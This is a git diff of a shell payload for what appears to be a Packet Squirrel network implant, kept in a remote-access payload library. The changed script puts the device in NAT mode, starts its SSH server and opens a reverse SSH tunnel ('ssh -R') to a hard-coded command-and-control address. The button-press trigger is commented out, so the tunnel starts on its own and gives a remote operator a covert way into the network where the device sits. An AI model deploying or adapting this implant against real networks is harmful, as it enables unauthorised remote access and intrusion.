diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/payloads/library/remote-access/SSH-remote-access/payload.sh
index a400968..76374ca 100644
--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -7,38 +7,58 @@
 # Net Mode: NAT
 # Firmware: 1.2
 #
-#
 # LED State Descriptions
 # Magenta Solid - SSH connecting
-# Amber Blink 5 Times - Waiting for user button press
+# Blue - SSH connection successful
 #
 
 # C2 Server address, port and tunnel port
-c2_server="192.168.1.123"
-c2_port=22
+c2_server="192.168.1.145"
 c2_tunnel_port=2222
 tunnel_user="username"
 # no pass needed, headless mode required so RSA key file is used.
 # generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
 
+# waiting for button press to start SSH connection.
+#BUTTON
+#
+
+# Magenta indicates SSH connection is launching and the server should have received the connection.
+LED SETUP
+
+echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
+
 # we need an IP, so it'll have to be NAT, unless implanted inline.
 NETMODE NAT
+sleep 8
 
-# amber blinking for button press to launch SSH connection.
-LED A BLINK
-# waiting for button press to start SSH connection.
-BUTTON
-# Green indicates SSH connection has been launched and the server should have received the connection.
-LED M SOLID
+# debug
+#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
 
-# -L indicates local port forwarding which tunnels connections to localhost on server to client.
+# fix file permission problems
+# chmod 600 id_rsa
+
+# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
 # Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
 # the tunnel port specified on the server to reach the Squirrel.
+#
+# default port is 22
+echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
 
-# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
-ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
+echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
+service sshd start
+sleep 3
 
-# SSH connection failed, target network may be hardened.
-LED R
-NETMODE OFF
-LED FINISH
\ No newline at end of file
+ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
+# echo $ssh_out >> /root/payloads/switch3/debug.txt
+# ssh_pid=$!
+
+echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
+
+LED ATTACK
+# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
+# SSH will prompt for verification, and to add host to trusted hosts file.
+
+#BUTTON 365d && {
+#   kill $ssh_pid
+#}